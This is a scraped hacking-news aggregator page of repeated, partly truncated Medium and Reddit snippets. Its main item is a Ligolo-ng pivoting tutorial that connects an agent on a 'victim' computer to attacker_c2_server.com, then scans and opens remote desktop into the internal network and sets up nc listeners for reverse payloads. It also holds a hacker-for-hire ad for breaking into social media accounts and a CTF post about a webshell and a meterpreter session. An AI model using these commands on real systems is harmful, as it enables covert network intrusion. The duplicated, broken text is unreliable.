Hacking on Medium
Exploiting the Dev VM
Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06
Continue reading on Medium »
Exploiting the Dev VM
Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06
Continue reading on Medium »
Hacking on Medium
DXventures grants $100,000 to Hats.finance to build a decentralized cyber security network
DXventures is the internal venture arm of DXdao.
Continue reading on Medium »
DXventures grants $100,000 to Hats.finance to build a decentralized cyber security network
DXventures is the internal venture arm of DXdao.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Investigate & Monitor Mobile Phone, Hack Facebook, WhatsApp, Instagram, Gmail, Legit Cyber Hacker…
Hello everyone, If you want to hire a reliable hacker to help you hack and program access into any device, system, website, Bitcoin site…
Continue reading on Medium »
Investigate & Monitor Mobile Phone, Hack Facebook, WhatsApp, Instagram, Gmail, Legit Cyber Hacker…
Hello everyone, If you want to hire a reliable hacker to help you hack and program access into any device, system, website, Bitcoin site…
Continue reading on Medium »
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium » (https://medium.com/@vimukumarasiri/what-is-bug-bounty-20afa920ea02?source=rss------bug_bounty-5)
Beyond rubber ducky: evil mass storage POC with AT90USBKEY2. malware-tool for offline system. USB composite device with keyboard + mass storage + exfiltration via radio.
https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/
submitted by /u/gid0rah (https://www.reddit.com/user/gid0rah)
[link] (https://www.driverentry.com/node/104) [comments] (https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/)
https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/
submitted by /u/gid0rah (https://www.reddit.com/user/gid0rah)
[link] (https://www.driverentry.com/node/104) [comments] (https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/)
What is Bug Bounty
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium »
Read more...
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux TutorialsLigolo-Ng : An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface
Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS.
Features
* Tun interface (No more SOCKS!)
* Simple UI with agent selection and network information
* Easy to use and setup
* Automatic certificate configuration with Let’s Encrypt
* Performant (Multiplexing)
* Does not require high privileges
* Socket listening/binding on the agent
* Multiple platforms supported for the agent
How Is This Different From Ligolo/Chisel/Meterpreter… ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
* SYN are translated to connect() on remote
* SYN-ACK is sent back if connect() succeed
* RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
* Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Building Ligolo-ng
Building ligolo-ng:
$go build -o agent cmd/agent/main.go
$go build -o proxy cmd/proxy/main.go
#Build agent for Windows
$GOOS=windows go build -o agent.exe cmd/agent/main.go
Setup Ligolo-ng
Start the proxy server on your Command and Control (C2) server (default 11601 listening will be use):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
TLS Options
Using Let’s Encrypt Autocert
When using the
Port 80 needs to be accessible for Let’s Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the
Automatic self-signed certificates (NOT RECOMMENDED)
The proxy/relay can automatically generate self-signed TLS certificates using the
The
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=”XX.XX.XX.XX:38000″
Use the
ligolo-ng » session
? Specify a session : 1 – nchatelain@nworkstation – XX.XX.XX.XX:38000
Display the network configuration of the agent using the
[Agent : nchatelain@nworkstation] » ifconfig
[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.[...]
Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS.
Features
* Tun interface (No more SOCKS!)
* Simple UI with agent selection and network information
* Easy to use and setup
* Automatic certificate configuration with Let’s Encrypt
* Performant (Multiplexing)
* Does not require high privileges
* Socket listening/binding on the agent
* Multiple platforms supported for the agent
How Is This Different From Ligolo/Chisel/Meterpreter… ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
* SYN are translated to connect() on remote
* SYN-ACK is sent back if connect() succeed
* RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
* Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Building Ligolo-ng
Building ligolo-ng:
$go build -o agent cmd/agent/main.go
$go build -o proxy cmd/proxy/main.go
#Build agent for Windows
$GOOS=windows go build -o agent.exe cmd/agent/main.go
Setup Ligolo-ng
Start the proxy server on your Command and Control (C2) server (default 11601 listening will be use):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
TLS Options
Using Let’s Encrypt Autocert
When using the
-autocert option, the proxy will automatically request a certificate (using Let’s Encrypt) for attacker_c2_server.com when an agent connects.Port 80 needs to be accessible for Let’s Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the
-certfile and -keyfile parameters.Automatic self-signed certificates (NOT RECOMMENDED)
The proxy/relay can automatically generate self-signed TLS certificates using the
-selfcert option.The
-ignore-cert option needs to be used with the agent.Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=”XX.XX.XX.XX:38000″
Use the
session command to select the agent.ligolo-ng » session
? Specify a session : 1 – nchatelain@nworkstation – XX.XX.XX.XX:38000
Display the network configuration of the agent using the
ifconfig command:[Agent : nchatelain@nworkstation] » ifconfig
[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.[...]
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux TutorialsLigolo-Ng : An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection…
$ sudo ip route add 192.168.0.0/24 dev ligolo
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server
[Agent : nchatelain@nworkstation] » listener_add –addr 0.0.0.0:1234 –to 127.0.0.1:4321 –tcp
INFO[1208] Listener created on remote agent!
On the
$ nc -lvp 4321
When a connection is made on the TCP port
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the
[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
Does It Require Administrator/Root Access ?
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
Supported Protocols/Packets
* TCP
* UDP
* ICMP (echo requests)
Performance
You can easily hit more than 100 Mbits/sec. Here is a test using
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Caveats
Because the agent is running without privileges, it’s not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use
Download
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[…]
$ rdesktop 192.168.0.123
[…]
Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the
listener_add command.The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server
[Agent : nchatelain@nworkstation] » listener_add –addr 0.0.0.0:1234 –to 127.0.0.1:4321 –tcp
INFO[1208] Listener created on remote agent!
On the
proxy:$ nc -lvp 4321
When a connection is made on the TCP port
1234 of the agent, nc will receive the connection.This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the
listener_list command and stop them using the listener_stop [ID] command:[Agent : nchatelain@nworkstation] » listener_list
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners │
├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
│ # │ AGENT │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234 │ 127.0.0.1:4321 │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
Does It Require Administrator/Root Access ?
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
Supported Protocols/Packets
* TCP
* UDP
* ICMP (echo requests)
Performance
You can easily hit more than 100 Mbits/sec. Here is a test using
iperf from a 200Mbits/s server to a 200Mbits/s connection.$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Caveats
Because the agent is running without privileges, it’s not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use
--unprivileged or -PE to avoid false positives.Download
CTF Help need iis_webdav Credentials cracked
https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/
<!-- SC_OFF -->Hey Guys i'm sitting in front of a CTF Lab and i'm stucking for a few days. the Flag is to get the NTLM hash of the Administrator FACTS: - Windows Server 2019
- Port 80 open
- webdav Directory
- cracked credentials of 2 Users (User1 and Administrator)
- uploaded Webshell to webdav directory
- Webshell is running as IIS_AppPool User
- tried metasploit iis_webdav with Credentials of User1 and Administrator (different payloads) always ERROR 500
- created a meterpreter session with uploaded exe started over the webshell NEED: - i need a way to escalate my Privileges to the Administrator User (credentials available)
- tried with some fany runas commands without success what could i try to get the flag? <!-- SC_ON --> submitted by /u/dontask4name (https://www.reddit.com/user/dontask4name)
[link] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/) [comments] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/)
https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/
<!-- SC_OFF -->Hey Guys i'm sitting in front of a CTF Lab and i'm stucking for a few days. the Flag is to get the NTLM hash of the Administrator FACTS: - Windows Server 2019
- Port 80 open
- webdav Directory
- cracked credentials of 2 Users (User1 and Administrator)
- uploaded Webshell to webdav directory
- Webshell is running as IIS_AppPool User
- tried metasploit iis_webdav with Credentials of User1 and Administrator (different payloads) always ERROR 500
- created a meterpreter session with uploaded exe started over the webshell NEED: - i need a way to escalate my Privileges to the Administrator User (credentials available)
- tried with some fany runas commands without success what could i try to get the flag? <!-- SC_ON --> submitted by /u/dontask4name (https://www.reddit.com/user/dontask4name)
[link] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/) [comments] (https://www.reddit.com/r/Pentesting/comments/ppvngh/ctf_help_need_iis_webdav_credentials_cracked/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
https://b.thumbs.redditmedia.com/VDG7_Aeffe17ovcoKJSPeADd743EKtKTA8bvAQ3G9vY.jpg I had installed chaosvpn however I have no idea what to mail. The mailing -info is given in ubuntu request to in the chaosvpn website but I couldn't interpret it.
Its my ubuntu vmware
submitted by /u/VortexFlickens
[link] [comments]
Its my ubuntu vmware
submitted by /u/VortexFlickens
[link] [comments]
hacking: security in practice
What is the relationship between Matrices and Arrays?
I understand what Matrices are and how they're used but I don't know too much about arrays.
submitted by /u/TuneAway
[link] [comments]
What is the relationship between Matrices and Arrays?
I understand what Matrices are and how they're used but I don't know too much about arrays.
submitted by /u/TuneAway
[link] [comments]
reddit
What is the relationship between Matrices and Arrays?
I understand what Matrices are and how they're used but I don't know too much about arrays.
hacking: security in practice
What's your host operating system?
i've been a guy who wants a stable os on host system that just works while i can pretty much do anything in a virtual machine without the fear of breaking my system.
elite linux users would hate me using "just works".
View Poll
submitted by /u/ixceyfa1con
[link] [comments]
What's your host operating system?
i've been a guy who wants a stable os on host system that just works while i can pretty much do anything in a virtual machine without the fear of breaking my system.
elite linux users would hate me using "just works".
View Poll
submitted by /u/ixceyfa1con
[link] [comments]
reddit
What's your host operating system?
i've been a guy who wants a stable os on host system that just works while i can pretty much do anything in a virtual machine without the fear of...
hacking: security in practice
I can't tell if this is really stupid or actually smart
Lots of forms have certain requirements for passwords (length, inclusion of certain characters, etc) but that doesn't stop people from sharing passwords. I think if websites said "We recommend using a password that is an embarrassing truth about yourself"
The effect of this would be longer passwords which are more difficult to bruteforce and no-one would share their password if it was something like "IregularlywetthebeduntilIwas15" or something like that.
Downside is if the password does get leaked it's more embarrassing
submitted by /u/doubleredacted
[link] [comments]
I can't tell if this is really stupid or actually smart
Lots of forms have certain requirements for passwords (length, inclusion of certain characters, etc) but that doesn't stop people from sharing passwords. I think if websites said "We recommend using a password that is an embarrassing truth about yourself"
The effect of this would be longer passwords which are more difficult to bruteforce and no-one would share their password if it was something like "IregularlywetthebeduntilIwas15" or something like that.
Downside is if the password does get leaked it's more embarrassing
submitted by /u/doubleredacted
[link] [comments]
reddit
I can't tell if this is really stupid or actually smart
Lots of forms have certain requirements for passwords (length, inclusion of certain characters, etc) but that doesn't stop people from sharing...